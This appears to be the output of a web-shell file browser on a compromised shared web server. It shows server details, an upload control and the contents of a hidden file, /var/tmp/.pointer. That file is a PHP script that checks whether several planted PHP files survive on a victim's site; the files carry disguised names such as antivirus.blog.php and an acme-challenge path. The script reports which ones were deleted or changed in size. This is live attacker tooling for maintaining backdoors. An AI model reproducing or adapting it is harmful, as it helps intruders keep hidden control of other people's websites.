HEX
Server: Apache
System: Linux iad1-shared-b8-39 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
User: galmanza (2396195)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: //var/tmp/.pointer
<?php   $r = '/home/parallelmvmt/trainyouremail.com'; $x = ["/.well-known/acme-challenge/com_docman.php"=>"bd@@4775761@@727",
"/farhad/ob_iconv_handle.php"=>"bd@@4771534@@549",
"/daphne/team/sounds.js.php"=>"bd@@4776076@@593",
"/daphne/agenda/antivirus.blog.php"=>"bd@@5981897@@1009",
"/daphne/coaching/masterEN.headers.php"=>"bd@@5982191@@942"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');